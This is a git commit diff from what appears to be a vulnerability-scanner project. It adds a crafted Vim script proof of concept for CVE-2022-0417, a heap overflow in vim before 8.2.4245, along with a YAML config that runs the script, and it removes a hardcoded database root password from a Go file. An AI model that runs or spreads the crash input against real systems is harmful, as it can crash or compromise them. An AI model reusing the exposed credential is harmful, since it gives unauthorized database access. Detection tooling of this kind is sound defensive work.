CVE-2022-0417

2023-03-10 13:47:58 +08:00 · 2023-03-10 13:47:58 +08:00 · f0d0189ca3
parent 6f92768056
commit f0d0189ca3
4 changed files with 58 additions and 2 deletions
--- a/data/SystemPocs/CVE-2022-0417/CVE-2022-0417
+++ b/data/SystemPocs/CVE-2022-0417/CVE-2022-0417
@ -0,0 +1,8 @@
+norm0o00000000000000000000ÿ0“000
+sil!normc00	0
+fu Retab(g,n)
+exe"ret"a:n
+endf
+cal l("",Retab(0,3)
+se tabstop=5500000000
+cal l("",Retab(0,0)
--- a/data/SystemPocs/CVE-2022-0417/CVE-2022-0417.yaml
+++ b/data/SystemPocs/CVE-2022-0417/CVE-2022-0417.yaml
@ -0,0 +1,48 @@
+FormatVer: 20230310
+Id: VE-2022-0417
+Belong: system
+PocHazardLevel: low
+Source: https://huntr.dev/bounties/fc86bc8d-c866-4ade-8b7f-e49cec306d1a/
+SiteInfo:
+    Name: Vim是一款基于UNIX平台的编辑器。
+    Severity: high
+    Description:
+        vim存在安全漏洞，该漏洞源于这个漏洞允许攻击者可利用该漏洞输入一个特别制作的文件，导致崩溃或代码执行。
+    ScopeOfInfluence:
+        vim < 8.2.4245
+    References:
+        - https://github.com/vim/vim/commit/652dee448618589de5528a9e9a36995803f5557a
+        - https://nvd.nist.gov/vuln/detail/CVE-2022-0417
+    SiteClassification:
+        CvssMetrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+        CvssScore: 7.8
+        CveId: CVE-2022-0417 
+        CweId: CWE-787,CWE-122
+        CnvdId: None
+        KveId: None
+    Tags:
+        - cve2022
+        - 崩溃
+        - 代码执行
+SiteRequests:
+    Implement: 
+        ImArray:
+            - Inter : vim
+              InterArgs :
+                - -u
+                - NONE
+                - -n
+                - -X
+                - -Z
+                - -e
+                - -m
+                - -s
+                - -S
+              Exec : CVE-2022-0417
+              Args : 
+                - -c
+                - ":qa!"
+        ExpireTime:       #second
+        Inter:
+            - "??:0"
+        Condition: None
--- a/data/SystemPocs/SystemPocs.yaml
+++ b/data/SystemPocs/SystemPocs.yaml
@ -16,4 +16,4 @@ ExplorerItems:
    # - ConfigFile: CVE-2023-22809/CVE-2023-22809.yaml   //开发完新字段后才能使用 
    - ConfigFile: CVE-2022-0543/CVE-2022-0543.yaml
    - ConfigFile: CVE-2021-41773/CVE-2021-41773.yaml
-
+    - ConfigFile: CVE-2022-0417/CVE-2022-0417.yaml  
--- a/src/tools/FastScan/FastScan.go
+++ b/src/tools/FastScan/FastScan.go
@ -17,7 +17,7 @@ import (
 var (
    dbhostsip  = "172.17.20.121:3306"
    dbusername = "root"
-    dbpassword = "Kylin123-"
+    dbpassword = ""
    dbname     = "kylincve"
 )